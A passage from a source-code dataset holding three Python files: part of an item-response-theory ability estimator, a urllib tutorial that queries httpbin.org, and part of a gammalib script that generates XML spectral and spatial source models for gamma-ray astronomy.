\"\"\"\n b = items.loc[:, ['b']].values\n z = self.D * (theta - b)\n prob = sigmod(z)\n # items['irt'] = prob\n return pd.Series(data=prob.flatten(), index=items.index), theta\n\n def _prob(self, theta: np.ndarray, a: np.ndarray, b: np.ndarray, c: np.ndarray = None):\n \"\"\"\n\n Parameters\n ----------\n theta shape=(n,1) n是学生数量\n a shape=(1,m) m是题目数量\n b shape=(1,m) m是题目数量\n c shape=(1,m) m是题目数量\n\n Returns\n -------\n\n \"\"\"\n\n z = self.D * a * (theta.reshape(len(theta), 1) - b)\n # print(type(z))\n if c is None:\n return sigmod(z)\n return c + (1 - c) * sigmod(z)\n\n def _object_func(self, theta: np.ndarray, y: np.ndarray, a: np.ndarray = None, b: np.ndarray = None,\n c: np.ndarray = None):\n \"\"\"\n .. math::\n Object function = - \\ln L(x;\\theta)=-(\\sum_{i=0}^n ({y^{(i)}} \\ln P + (1-y^{(i)}) \\ln (1-P)))\n Parameters\n ----------\n theta\n a\n b\n c\n\n Returns\n -------\n res : OptimizeResult\n\n The optimization result represented as a OptimizeResult object.\n Important attributes are: x the solution array, success a Boolean flag indicating if the optimizer\n exited successfully and message which describes the cause of the termination.\n See OptimizeResult for a description of other attributes.\n \"\"\"\n\n # 预测值\n y_hat = self._prob(theta=theta, a=a, b=b)\n # 答题记录通常不是满记录的,里面有空值,对于空值设置为0,然后再求sum,这样不影响结果\n # 如果 y_hat 中有0或者1的值 无法求log\n # if (y_hat == 1.0).any() or (y_hat == 0).any():\n # print('dfsfdf')\n # np.seterr(divide='ignore')\n # try:\n obj = y * np.log(y_hat) + (1 - y) * np.log(1 - y_hat)\n # except RuntimeWarning:\n # print('dfdf')\n\n # obj[np.isneginf(obj)] = 0\n # np.seterr(divide='warn')\n # 用where处理不了空值,如果是空值,where认为是真\n # obj = - np.sum(np.where(y, np.log(y_hat), np.log(1 - y_hat)))\n # print('obj', obj)\n # 目标函数没有求平均\n return - np.sum(np.nan_to_num(obj, copy=False))\n\n def _jac_theta(self, theta: np.ndarray, y: np.ndarray, a: np.ndarray = None, b: np.ndarray = None,\n c: np.ndarray = None):\n # 预测值\n y_hat = self._prob(theta=theta, a=a, b=b)\n # 一阶导数\n # 每一列是一个样本,求所有样本的平均值\n _all = self.D * a * (y_hat - y)\n\n # 答题记录通常不是满记录的,里面有空值,对于空值设置为0,然后再求sum,这样不影响结果\n grd = np.sum(np.nan_to_num(_all, copy=False), axis=1)\n # grd = grd.reshape(len(grd), 1)\n # print(grd.shape, file=sys.stderr)\n return grd\n\n def estimate_theta(self, tol=None, options=None, bounds=None):\n \"\"\"\n 已知题目参数的情况下,估计学生的能力值。\n 优化算法说明参考 https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.minimize.html#scipy.optimize.minimize\n\n Parameters\n ----------\n method 优化算法,可选 CG、Newton-CG、L-BFGS-B\n tol\n options\n bounds\n join join=True,所有学生一起估计;反之,每个学生独立估计\n\n Returns\n -------\n\n \"\"\"\n item_count = len(self.item_vector)\n if 'a' in self.item_vector.columns:\n a = self.item_vector.loc[:, 'a'].values.reshape(1, item_count)\n else:\n a = None\n\n b = self.item_vector.loc[:, 'b'].values.reshape(1, item_count)\n # if 'c' in self.item_vector.columns:\n # c = self.item_vector.loc[:, 'c'].values.reshape(1, item_count)\n # else:\n # c = None\n\n success = []\n\n # self._es_res_theta = []\n\n # 每个人独立估计\n for index, row in self.response_matrix.iterrows():\n # 注意y可能有缺失值\n yy = row.dropna()\n # len(y) == len(y.dropna())\n # 全对的情况\n if yy.sum() == len(yy):\n theta = self.response_sequence.loc[self.response_sequence['user_id'] == index, 'b'].max() + 0.5\n success.append(True)\n # self._es_res_theta.append(res)\n elif yy.sum() == 0:\n # 全错的情况\n theta = self.response_sequence.loc[self.response_sequence['user_id'] == index, 'b'].min() - 0.5\n success.append(True)\n else:\n y = row.values.reshape(1, len(row))\n theta = self.user_vector.loc[index, 'theta']\n\n res = minimize(self._object_func, x0=[theta], args=(y, a, b), jac=self._jac_theta,\n bounds=bounds, options=options, tol=tol)\n theta = res.x[0]\n success.append(res.success)\n\n # self._es_res_theta.append(res)\n # 全错估计值会小于0\n theta = 0 if theta < 0 else theta\n\n self.user_vector.loc[index, 'theta'] = theta\n\n return all(success)\n\n def to_dict(self):\n return self.user_vector['theta'].to_dict()\n\n @classmethod\n def from_dict(cls, serialize_data):\n obj = cls()\n index = []\n theta = []\n for key, value in serialize_data.items():\n index.append(key)\n theta.append(value)\n obj.set_theta(pd.DataFrame({'theta': theta}, index=index))\n return obj\n\n def to_pickle(self):\n fh = tempfile.TemporaryFile(mode='w+b')\n self.user_vector.to_pickle(path=fh)\n fh.seek(0)\n data = fh.read()\n fh.close()\n return data\n\n @classmethod\n def from_pickle(cls, data):\n fh = tempfile.TemporaryFile(mode='w+b')\n fh.write(data)\n fh.seek(0)\n user_vector = pd.read_pickle(fh)\n fh.close()\n obj = cls()\n # cf构造函数 需要把0-1作答结果转成-1,1的形式,\n # 这里不能用构造函数传入数据\n obj.user_vector = user_vector\n return obj\n\n def get_user_vecotor(self, user_id):\n if self.user_vector is not None and len(self.user_vector) > 0:\n if user_id in self.user_vector.index:\n return self.user_vector.loc[user_id, :]\n return None\n\n def get_user_info(self, user_id):\n vector = self.get_user_vector(user_id=user_id)\n if not vector:\n return None\n\n # theta = vector.get('theta',None)\n # theta = vector.get('accuracy_all',None)\n # theta = vector.get('count_all',None)\n","repo_name":"zhangzhenhu/prophet","sub_path":"feature/irt.py","file_name":"irt.py","file_ext":"py","file_size_in_byte":18504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43939741965","text":"import urllib.request\nimport json\n\n# 接受一个字符串作为参数\nr = urllib.request.urlopen('http://httpbin.org/get')\n# 读取response的内容\ntext = r.read()\nprint(text)\nprint('*' * 50)\n# http返回状态码和msg\nprint(r.status, r.reason)\nprint('*' * 50)\nr.close()\n# 返回的��容是json格式,直接用load函数加载\nobj = json.loads(text)\nprint(obj)\nprint('*' * 50)\n\n# r.headers是一个HTTPMessage对象\nprint(r.headers)\nprint('*' * 50)\n\nfor k, v in r.headers._headers:\n print('%s: %s' % (k, v))\nprint('*' * 50)\n\nua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ' \\\n 'Chrome/89.0.4389.90 Safari/537.36 '\n# 添加自定义的头信息\nreq = urllib.request.Request('http://httpbin.org/user-agent')\nreq.add_header('User-agent', ua)\n# 接受一个urllib.request.Request对象作为参数\nr = urllib.request.urlopen(req)\nresp = json.load(r)\nprint(\"user-agent:\", resp[\"user-agent\"])\nprint('*' * 50)\n\nauth_handler = urllib.request.HTTPBasicAuthHandler()\nauth_handler.add_password(realm='httpbin.org',\n uri='basic-auth/hello/123456',\n user='hello',\n passwd='123456')\nopener = urllib.request.build_opener(auth_handler)\nurllib.request.install_opener(opener)\nr = urllib.request.urlopen('http://httpbin.org')\nprint(r.read().decode('utf-8'))\nprint('*' * 50)\n\n# 使用GET方法传递参数\nparams = urllib.parse.urlencode({'spam': 1, 'eggs': 2, 'bacon': 2})\nurl = 'http://httpbin.org/get?%s' % params\nwith urllib.request.urlopen(url) as f:\n print(json.load(f))\nprint('*' * 50)\n\n# 使用POST方法传递参数\ndata = urllib.parse.urlencode({'name': 'hello_world', 'age': 18})\ndata = data.encode()\nwith urllib.request.urlopen('http://httpbin.org/post', data) as f:\n print(json.load(f))\nprint('*' * 50)\n\n# 使用代理IP请求远程url\nproxy_handler = urllib.request.ProxyHandler({'http': 'http://172.0.0.1:9000'})\nopener = urllib.request.build_opener(proxy_handler)\nr = opener.open('http://httpbin.org/ip')\nprint('11111111', r.read())\n","repo_name":"showyouhappiness/Python_study","sub_path":"爬虫/urllib_sample.py","file_name":"urllib_sample.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24520478764","text":"#! /usr/bin/env python\nimport gammalib\nimport sys\n\n# =========================================== #\n# Create a model container filled with models #\n# =========================================== #\n\ndef numdiv(num):\n\t#divide number into number and power \n\tnumlist =(\"%.5e\" %num).split('e')\n\tnumlist[1]=\"1e\"+numlist[1]\n\treturn numlist\n\ndef EnConv(energy, unit):\n\t# divide energy \n\t# 50.0*GeV ---> 50000.0 , if in MeV\n\tlistEnergy = [0.0,0.0]\n\t\n\tif (unit == \"MeV\"):\n\t\tlistEnergy[0] = gammalib.GEnergy(float(energy.split('*')[0]),energy.split('*')[1]).MeV()\n\t\tlistEnergy[1] = \"1.0\" \n\telif (unit == \"GeV\"):\n\t\tlistEnergy[0] = gammalib.GEnergy(float(energy.split('*')[0]),energy.split('*')[1]).GeV()\n\t\tlistEnergy[1] = \"1e3\" \n\telif (unit == \"TeV\"):\n\t\tlistEnergy[0] = gammalib.GEnergy(float(energy.split('*')[0]),energy.split('*')[1]).TeV()\n\t\tlistEnergy[1] = \"1e6\" \n\telse:\n\t\tprint(\"Wrong Energy conversion! CHECK value \"+energy) \n \n\treturn listEnergy\n\n\ndef sourceDef(info):\n\t# --------------------\n\t# CREATE SOURCE BRANCH\n\t# --------------------\n\t# spectral and spatial components will be appended to this branch\n\t# 1 branch for each source in the XML model\n\n\tsrcname = info[0]\n\tmodelname = info[1] #extract model name for SOURCE\n\tts = info[2]\n\t#if ver != '': print('--------------------------------')\n\n\t\n\tpointList = ['Point']\n\textendedList = ['RadDisk','RadGauss','RadShell', 'EllDisk', 'EllGauss']\n\tdiffuseList = ['DiffIso','DiffMap','DiffMapCube']\n\tbkg_radial = ['BkgGauss', 'Profile', 'Polynom']\n\tbkg_irf = ['CTAIrf'] \n\tbkg_cube = ['CTACube']\n\n\tif (modelname in pointList):\n\t\tsource_txt = 'source type=\"PointSource\" name=\"'+str(srcname)+'\"'\n\telif (modelname in extendedList):\n\t\tsource_txt = 'source type=\"ExtendedSource\" name=\"'+str(srcname)+'\"'\n\telif (modelname in diffuseList):\n\t\tsource_txt = 'source type=\"DiffuseSource\" name=\"'+str(srcname)+'\"'\n\telif (modelname in bkg_radial):\n\t\tsource_txt = 'source name=\"Background\" type=\"RadialAcceptance\" instrument=\"CTA\"'\n\telif (modelname in bkg_irf):\n\t\tsource_txt = 'source name=\"Background\" type=\"CTAIrfBackground\" instrument=\"CTA\"'\n\telif (modelname in bkg_cube):\n\t\tsource_txt = 'source name=\"Background\" type=\"CTACubeBackground\" instrument=\"CTA\"'\n\telse: \n\t\tprint(\"Mispelled spatial model, open the .txt and check it!\")\n\t\tsys.exit() \n\n\tif (ts == \"1\"):\n\t\tsource_txt = source_txt + ' tscalc=\"1\"'\n\n\tsource_branch = gammalib.GXmlElement(source_txt) \n\tif (srcname[0:2] == \"BKG\"):\n\t\tif ver != '': print(\"-----------background-----------\")\n\t\tif ver != '': print('The source ' + srcname + ' is a ' + modelname) \n\n\t\t#create SPECTRAL model\n\t\tspectral = specFun(info[8:]) #string \n\t\tsource_branch.append(spectral) \n\telse: \n\t\tif ver != '': print(\"------source: \" + srcname + \"-------\")\n\t\tif ver != '': print('The source ' + srcname + ' is a ' + modelname) \n\n\t\t#create SPECTRAL model\n\t\tspectral = specFun(info[8:]) #string \n\t\tsource_branch.append(spectral) \n\n\t\tif (modelname != 'CTAIrf' and modelname != 'CTACube'):\n\t\t\t#create SPATIAL model \n\t\t\tspatial = spatFun(info[1:])\n\t\t\tsource_branch.append(spatial)\n\n\t\t#check if the last item is a file fits for the TEMPORAL evolution \n\t\tif (info[-1][-4:] == 'fits'):\n\t\t\t#create TEMPORAL model (use last two item in list, NORMALIZATION and FITS file)\n\t\t\ttemporal = temporalFun(info[-2:])\n\t\t\tsource_branch.append(temporal)\n\n\tif (ts == \"1\"):\n\t\tif ver != '': print(\"TS calculation: yes\")\n\t\t#source_txt=source_txt+' tscalc=\"1\"'\n\telse:\n\t\tif ver != '': print(\"TS calculation: no\")\n\n\treturn source_branch\n\ndef spatFun(inSpat):\n\t# --------------------\n\t# CREATE SPATIAL MODEL\n\t# --------------------\n\n\t#get model name\n\tSpatModel = inSpat[0] \n\n\t# set RA and DEC, common for all the spatial models\n\tra = inSpat[2]\n\tdec = inSpat[3]\n\n\t# set text to be put in the xml file\n\tra_text='parameter scale=\"1.0\" name=\"RA\" min=\"-360\" max=\"360\" free=\"0\" value=\"'+ra+'\"'\n\tdec_text='parameter scale=\"1.0\" name=\"DEC\" min=\"-90\" max=\"90\" free=\"0\" value=\"'+dec+'\"'\n\n\tif (SpatModel == 'Point'):\n\t\tspatial = gammalib.GXmlElement('spatialModel type=\"SkyDirFunction\"') #compatibility with Fermi/LAT\n\t\tspatial.append(ra_text)\n\t\tspatial.append(dec_text)\n\n\telif (SpatModel == 'RadDisk'):\n\t\tspatial = gammalib.GXmlElement('spatialModel type=\"DiskFunction\"')\n\t\tspatial.append(ra_text)\n\t\tspatial.append(dec_text)\n\t\tradius = inSpat[4]\n\t\tradius_text = 'parameter name=\"Radius\" scale=\"1.0\" min=\"0.01\" max=\"10\" free=\"0\" value=\"' + radius +'\"'\n\t\tspatial.append(radius_text)\n\n\telif (SpatModel == 'RadGauss'):\n\t\tspatial = gammalib.GXmlElement('spatialModel type=\"GaussFunction\"')\n\t\tspatial.append(ra_text)\n\t\tspatial.append(dec_text)\n\t\tsig = inSpat[4]\n\t\tsig_text = 'parameter name=\"Sigma\" scale=\"1.0\" min=\"0.01\" max=\"10\" free=\"0\" value=\"' + sig +'\"'\n\t\tspatial.append(sig_text)\n\n\telif (SpatModel == 'RadShell'):\n\t\tspatial = gammalib.GXmlElement('spatialModel type=\"ShellFunction\"')\n\t\tspatial.append(ra_text)\n\t\tspatial.append(dec_text)\n\t\tradius = inSpat[4]\n\t\twidth = inSpat[5]\n\t\tradius_text = 'parameter name=\"Radius\" scale=\"1.0\" min=\"0.01\" max=\"10\" free=\"0\" value=\"' + radius +'\"'\n\t\twidth_text = 'parameter name=\"Width\" scale=\"1.0\" min=\"0.01\" max=\"10\" free=\"0\" value=\"' + width + '\"'\n\t\tspatial.append(radius_text)\n\t\tspatial.append(width_text)\n\n\telif (SpatModel == 'EllDisk'):\n\t\tspatial = gammalib.GXmlElement('spatialModel type=\"EllipticalDisk\"')\n\t\tspatial.append(ra_text)\n\t\tspatial.append(dec_text)\n\t\tPA = inSpat[4]\n\t\tminr = inSpat[5]\n\t\tmaxr = inSpat[6]\n\t\tPA_text = 'parameter name=\"PA\" scale=\"1.0\" min=\"-360\" max=\"360\" free=\"0\" value=\"' + PA +'\"'\n\t\tminr_text = 'parameter name=\"MinorRadius\" scale=\"1.0\" min=\"0.001\" max=\"10\" free=\"0\" value=\"' + minr + '\"'\n\t\tmaxr_text = 'parameter name=\"MajorRadius\" scale=\"1.0\" min=\"0.001\" max=\"10\" free=\"0\" value=\"' + maxr + '\"'\n\t\tspatial.append(PA_text)\n\t\tspatial.append(minr_text)\n\t\tspatial.append(maxr_text)\n\n\telif (SpatModel == 'EllGauss'):\n\t\tspatial = gammalib.GXmlElement('spatialModel type=\"EllipticalGauss\"')\n\t\tspatial.append(ra_text)\n\t\tspatial.append(dec_text)\n\t\tPA = inSpat[4]\n\t\tminr = inSpat[5]\n\t\tmaxr = inSpat[6]\n\t\tPA_text = 'parameter name=\"PA\" scale=\"1.0\" min=\"-360\" max=\"360\" free=\"0\" value=\"' + PA +'\"'\n\t\tminr_text = 'parameter name=\"MinorRadius\" scale=\"1.0\" min=\"0.001\" max=\"10\" free=\"0\" value=\"' + minr + '\"'\n\t\tmaxr_text = 'parameter name=\"MajorRadius\" scale=\"1.0\" min=\"0.001\" max=\"10\" free=\"0\" value=\"' + maxr + '\"'\n\t\tspatial.append(PA_text)\n\t\tspatial.append(minr_text)\n\t\tspatial.append(maxr_text)\n\n\telif (SpatModel == 'DiffIso'):\n\t\tspatial = gammalib.GXmlElement('spatialModel type=\"DiffuseSource\"')\n\t\tvalue = inSpat[4]\n\t\tvalue_text = 'parameter name=\"Value\" scale=\"1\" min=\"1\" max=\"1\" free=\"0\" value=\"' + value +'\"' \n\t\tspatial.append(value_text)\n\n\telif (SpatModel == 'DiffMap'):\n\t\tspatial = gammalib.GXmlElement('spatialModel type=\"DiffuseSource\" file=\"map.fits\"')\n\t\tvalue = inSpat[4]\n\t\tvalue_text = 'parameter name=\"Prefactor\" scale=\"1\" min=\"0.001\" max=\"1000.0\" free=\"0\" value=\"' + value +'\"'\n\t\tspatial.append(value_text)\n\n\telif (SpatModel == 'DiffMapCube'):\n\t\tspatial = gammalib.GXmlElement('spatialModel type=\"MapCubeFunction\" file=\"map_cube.fits\"')\n\t\tvalue = inSpat[4]\n\t\tvalue_text = 'parameter name=\"Normalization\" scale=\"1\" min=\"0.001\" max=\"1000.0\" free=\"0\" value=\"' + value +'\"'\n\t\tspatial.append(value_text) \n\n\n\t\t#---------- Here starts background spatial models\n\n\telif (SpatModel == 'BkgGauss'):\n\t\tspatial = gammalib.GXmlElement('radialModel type=\"Gaussian\"')\n\t\tsig = inSpat[2]\n\t\tsig_text = 'parameter name=\"Sigma\" scale=\"1.0\" min=\"0.01\" max=\"10.0\" free=\"0\" value=\"' + sig +'\"'\n\t\tspatial.append(sig_text)\n\t\t\t \n\telif (SpatModel == 'Profile'):\n\t\tspatial = gammalib.GXmlElement('radialModel type=\"Profile\"')\n\t\twidth = inSpat[2]\n\t\tcore = inSpat[3]\n\t\ttail = inSpat[4]\n\t\twidth_text = 'parameter name=\"Width\" scale=\"1.0\" min=\"0.01\" max=\"10000.0\" free=\"0\" value=\"' + width +'\"'\n\t\tcore_text = 'parameter name=\"Core\" scale=\"1.0\" min=\"0.01\" max=\"10000.0\" free=\"0\" value=\"' + core +'\"'\n\t\ttail_text = 'parameter name=\"Tail\" scale=\"1.0\" min=\"0.01\" max=\"10000.0\" free=\"0\" value=\"' + tail +'\"'\n\n\t\tspatial.append(width_text)\n\t\tspatial.append(core_text)\n\t\tspatial.append(tail_text)\n\n\telif (SpatModel == 'Polynom'):\n\t\tspatial = gammalib.GXmlElement('radialModel type=\"Polynom\"')\n\t\tcoef = inSpat[2]\n\t\tcoef = coef.split(\"_\")\n\t\tfor i in range(0,len(coef)):\n\t\t\tname_coef = 'Coeff' + str(i)\n\t\t\tcoef_text = 'parameter name=\"' + name_coef +'\" scale=\"1.0\" value=\"'+coef[i]+'\" min=\"-10.0\" max=\"10.0\" free=\"0\"'\n\t\t\tspatial.append(coef_text)\n\t\n\telse:\n\t\tprint(\"Wrong input model\")\n\t\tsys.exit()\n\treturn spatial\n\ndef specFun(inSpec):\n\t# --------------------\n\t# CREATE SPECTRAL MODEL\n\t# --------------------\n\t# CHOOSE BETWEEN = \"PowerLaw2\", \"PowerLaw\", \"NodeFunction\", \"LogParabola\", \"Gaussian\", \"FileFunction\", \"ExpCutoff\", \"ConstantValue\", \"BrokenPowerLaw\"\n\n\t#set spectral model name\n\tSpecModel = inSpec[0]\n\t\n\tif (SpecModel == 'CONST'):\n\t\t#CONSTANT MODEL\n\t\tif ver != '': print('Spectral model: ' + SpecModel)\n\t\tnorm = float(inSpec[1]) \n\t\tnorm_text='parameter scale=\"'+numdiv(norm)[1]+'\" name=\"Normalization\" min=\"1e-7\" max=\"1000\" free=\"1\" value=\"'+numdiv(norm)[0]+'\"'\n\t\tspectral = gammalib.GXmlElement('spectrum type=\"ConstantValue\"') \n\t\tspectral.append(norm_text)\n\n\telif (SpecModel == 'FUNC'):\n\t\t# FILE FUNCTION\n\t\tif ver != '': print('Spectral model: ' + SpecModel)\n\t\tnorm = float(inSpec[1])\n\t\tfilepath = inSpec[2]\n\t\tnorm_text='parameter scale=\"'+numdiv(norm)[1]+'\" name=\"Normalization\" min=\"1e-7\" max=\"1000\" free=\"1\" value=\"'+numdiv(norm)[0]+'\"'\n\t\tspectral = gammalib.GXmlElement('spectrum type=\"FileFunction\" file=\"'+filepath+'\"') \n\t\tspectral.append(norm_text)\n\t\n\telif (SpecModel == 'NODE'):\n\t\tif ver != '': print(SpecModel)\n\t\tn_param = int(inSpec[1]) #number of parameters\n\n\t\tif n_param % 2 != 0:\n\t\t\tif ver != '': print(\"Wrong number of parameters in NODE SPECTRAL MODEL\")\n\t\t\tsys.exit() \n\n\t\tspectral = gammalib.GXmlElement('spectrum type=\"NodeFunction\"')\n\n\t\tvalues = []\n\t\tfor n in range(2, n_param + 2, 2):\n\t\t\tif ver != '': print(inSpec[n])\n\t\t\tif ver != '': print(type(inSpec[n]))\n\t\t\tvalues.append(EnConv(inSpec[n], \"MeV\")) #energy\n\t\t\tvalues.append(inSpec[n+1])\t\t\t\t#intensity\n\n\t\tval_x = values[0::2] #select only even characters\n\t\tval_y = values[1::2] #select only odd characters\n\t\tif ver != '': print(val_x)\n\t\tpoints = [(val_x[i],val_y[i]) for i in range(0, len(val_x))] #making list of points\n\t\tpointss = sorted(points, key=lambda k: k[1]) #sort points by energy\n\t\tif ver != '': print(pointss)\n\t\tfor n in range(0, len(pointss)):\t\n\t\t\tenergy_text = 'parameter scale=\"'+str(pointss[n][0][1])+'\" name=\"Energy\" min=\"0.1\" max=\"1.0e20\" free=\"0\" value=\"'+str(pointss[n][0][0])+'\"'\n\t\t\tintens_text = 'parameter scale=\"1e-07\" name=\"Intensity\" min=\"1e-07\" max=\"1000.0\" free=\"1\" value=\"'+pointss[n][1]+'\"'\n\t\t\tnode = spectral.append('node')\n\t\t\tnode.append(energy_text)\n\t\t\tnode.append(intens_text)\n\n\telif (SpecModel == 'PL'):\n\t\t#POWER LAW MODEL\n\t\tif ver != '': print('Spectral model: '+SpecModel)\n\t\tpref = float(inSpec[1])\n\t\tindex = inSpec[2]\n\t\tPivotEnergy = EnConv(inSpec[3], \"MeV\") #convert the energy in MeV\n\n\t\tpref_text='parameter scale=\"'+numdiv(pref)[1]+'\" name=\"Prefactor\" min=\"1e-7\" max=\"1000\" free=\"1\" value=\"'+numdiv(pref)[0]+'\"'\n\t\tindex_text='parameter scale=\"-1.0\" name=\"Index\" min=\"0.0\" max=\"+10.0\" free=\"1\" value=\"'+index+'\"'\n\t\tenergy_text='parameter scale=\"'+str(PivotEnergy[1])+'\" name=\"Scale\" min=\"0.0\" max=\"+10000000.0\" free=\"0\" value=\"'+str(PivotEnergy[0])+'\"'\n\n\t\tspectral = gammalib.GXmlElement('spectrum type=\"PowerLaw\"')\n\t\tspectral.append(pref_text)\n\t\tspectral.append(index_text)\n\t\tspectral.append(energy_text)\n\n\telif (SpecModel == 'PL2'):\n\t\t#POWER LAW 2 MODEL\n\t\tif ver != '': print('Spectral model: '+SpecModel)\n\t\tpref = float(inSpec[1])\n\t\tindex = inSpec[2]\n\t\tMinEnergy = EnConv(inSpec[3], \"MeV\") #convert the energy in MeV\n\t\tMaxEnergy = EnConv(inSpec[4], \"MeV\") #convert the energy in MeV\n\t\tif ver != '': print(MaxEnergy)\n\n\t\tpref_text='parameter scale=\"'+numdiv(pref)[1]+'\" name=\"Integral\" min=\"1e-7\" max=\"1000\" free=\"1\" value=\"'+numdiv(pref)[0]+'\"'\n\t\tindex_text='parameter scale=\"-1.0\" name=\"Index\" min=\"0.0\" max=\"+10.0\" free=\"1\" value=\"'+index+'\"'\n\t\tmin_energy_text='parameter scale=\"'+str(MinEnergy[1])+'\" name=\"LowerLimit\" min=\"10.0\" max=\"+100000000.0\" free=\"0\" value=\"'+str(MinEnergy[0])+'\"'\n\t\tmax_energy_text='parameter scale=\"'+str(MaxEnergy[1])+'\" name=\"UpperLimit\" min=\"10.0\" max=\"+100000000.0\" free=\"0\" value=\"'+str(MaxEnergy[0])+'\"'\n\n\t\tspectral = gammalib.GXmlElement('spectrum type=\"PowerLaw2\"')\n\t\tspectral.append(pref_text)\n\t\tspectral.append(index_text)\n\t\tspectral.append(min_energy_text)\n\t\tspectral.append(max_energy_text)\n\n\telif (SpecModel == 'BRPL'):\n\t\t# BrokenPowerLaw MODEL\n\t\tif ver != '': print('Spectral model: ' + SpecModel)\n\t\tpref = float(inSpec[1])\n\t\tindex1 = inSpec[2] #must be negative\n\t\tCutEnergy = EnConv(inSpec[3],\"GeV\") #convert the energy in GeV\n\t\tindex2 = inSpec[4] # must be negative\n\n\t\tpref_text='parameter scale=\"'+numdiv(pref)[1]+'\" name=\"Prefactor\" min=\"1e-7\" max=\"1000\" free=\"1\" value=\"'+numdiv(pref)[0]+'\"'\n\t\tindex1_text='parameter scale=\"-1.0\" name=\"Index1\" min=\"0.01\" max=\"+10.0\" free=\"1\" value=\"'+index1+'\"'\n\t\tcut_energy_text='parameter scale=\"'+str(CutEnergy[1])+'\" name=\"BreakValue\" min=\"10.0\" max=\"+100000000.0\" free=\"1\" value=\"'+str(CutEnergy[0])+'\"'\n\t\tindex2_text='parameter scale=\"-1.0\" name=\"Index2\" min=\"0.01\" max=\"+10.0\" free=\"1\" value=\"'+index2+'\"'\n\n\t\tspectral = gammalib.GXmlElement('spectrum type=\"BrokenPowerLaw\"')\n\t\tspectral.append(pref_text)\n\t\tspectral.append(index1_text)\n\t\tspectral.append(cut_energy_text)\n\t\tspectral.append(index2_text)\n\n\telif (SpecModel == 'EXPL'):\n\t\t#Exponential CUT OFF POWER LAW MODEL\n\t\tif ver != '': print('Spectral model: ' + SpecModel)\n\t\tpref = float(inSpec[1])\n\t\tindex = inSpec[2]\n\t\tPivotEnergy = EnConv(inSpec[3], \"MeV\") #convert the energy in MeV\n\t\tCutEnergy = EnConv(inSpec[4], \"MeV\") #convert the energy in MeV\n\t\t\n\t\tpref_text='parameter scale=\"'+numdiv(pref)[1]+'\" name=\"Prefactor\" min=\"1e-7\" max=\"1000\" free=\"1\" value=\"'+numdiv(pref)[0]+'\"'\n\t\tindex_text='parameter scale=\"-1.0\" name=\"Index\" min=\"0.0\" max=\"+10.0\" free=\"1\" value=\"'+index+'\"'\n\t\tcut_energy_text='parameter scale=\"1.0\" name=\"Cutoff\" min=\"0.01\" max=\"100000000.0\" free=\"1\" value=\"'+str(CutEnergy[0])+'\"'\n\t\tpiv_energy_text='parameter scale=\"1.0\" name=\"Scale\" min=\"0.01\" max=\"100000000.0\" free=\"0\" value=\"'+str(PivotEnergy[0])+'\"'\n\n\t\tspectral = gammalib.GXmlElement('spectrum type=\"ExpCutoff\"')\n\t\tspectral.append(pref_text)\n\t\tspectral.append(index_text)\n\t\tspectral.append(cut_energy_text)\n\t\tspectral.append(piv_energy_text)\n\n\telif (SpecModel == 'SEPL'):\n\t\t#SUPER EXPONENTIALY CUY-OFF POWER LAW\n\t\tif ver != '': print('Spectral model: ' + SpecModel)\n\t\tpref = float(inSpec[1])\n\t\tindex1 = inSpec[2]\n\t\tindex2 = inSpec[3]\n\t\tPivotEnergy = EnConv(inSpec[4], \"MeV\") #convert the energy in MeV \n\t\tCutEnergy = EnConv(inSpec[5], \"MeV\") #convert the energy in MeV \n\n\t\tpref_text='parameter scale=\"'+numdiv(pref)[1]+'\" name=\"Prefactor\" min=\"1e-7\" max=\"1000\" free=\"1\" value=\"'+numdiv(pref)[0]+'\"'\n\t\tindex1_text='parameter scale=\"-1.0\" name=\"Index1\" min=\"0.0\" max=\"+10.0\" free=\"1\" value=\"'+index1+'\"'\n\t\tindex2_text='parameter scale=\"1.0\" name=\"Index2\" min=\"0.1\" max=\"10.0\" free=\"1\" value=\"'+index2+'\"'\n\t\tcut_energy_text='parameter scale=\"'+str(CutEnergy[1])+'\" name=\"Cutoff\" min=\"0.01\" max=\"100000000.0\" free=\"1\" value=\"'+str(CutEnergy[0])+'\"'\n\t\tpiv_energy_text='parameter scale=\"'+str(PivotEnergy[1])+'\" name=\"Scale\" min=\"0.01\" max=\"100000000.0\" free=\"0\" value=\"'+str(PivotEnergy[0])+'\"'\n\n\n\t\tspectral = gammalib.GXmlElement('spectrum type=\"PLSuperExpCutoff\"')\n\t\tspectral.append(pref_text)\n\t\tspectral.append(index1_text)\n\t\tspectral.append(index2_text)\n\t\tspectral.append(cut_energy_text)\n\t\tspectral.append(piv_energy_text)\n\n\telif (SpecModel == 'LOGPAR'):\n\t\tif ver != '': print('Spectral model: ' + SpecModel)\n\t\t#LOG PARABOLA\n\t\tpref = float(inSpec[1])\n\t\tindex = inSpec[2]\n\t\tcurv = inSpec[3]\n\t\tE_scale = EnConv(inSpec[4], \"MeV\") #convert the energy in MeV\n\n\t\tpref_text='parameter scale=\"'+numdiv(pref)[1]+'\" name=\"Prefactor\" min=\"1e-7\" max=\"1000\" free=\"1\" value=\"'+numdiv(pref)[0]+'\"'\n\t\tindex_text='parameter scale=\"-1.0\" name=\"Index\" min=\"0.0\" max=\"+10.0\" free=\"1\" value=\"'+index+'\"'\n\t\tcurv_text='parameter scale=\"-1.0\" name=\"Curvature\" min=\"-5.0\" max=\"+5.0\" free=\"1\" value=\"'+ curv +'\"'\n\t\tE_scale_text='parameter scale=\"1.0\" name=\"Scale\" min=\"0.01\" max=\"100000000.0\" free=\"0\" value=\"'+str(E_scale[0])+'\"'\n\t\t\n\t\tspectral = gammalib.GXmlElement('spectrum type=\"LogParabola\"')\n\n\t\tspectral.append(pref_text)\n\t\tspectral.append(index_text)\n\t\tspectral.append(curv_text)\n\t\tspectral.append(E_scale_text)\n\n\telif (SpecModel == 'GAUSS'):\n\t\tif ver != '': print('Spectral model: ' + SpecModel)\n\t\t#GAUSSIAN FUNCTION\n\t\tnorm = float(inSpec[1])\n\t\tmean = EnConv(inSpec[2],\"GeV\")\n\t\tsigma = inSpec[3]\n\n\t\tnorm_text = 'parameter scale=\"'+numdiv(norm)[1]+'\" name=\"Normalization\" min=\"1e-7\" max=\"1000.0\" free=\"1\" value=\"'+numdiv(norm)[0]+'\"'\n\t\tmean_text = 'parameter 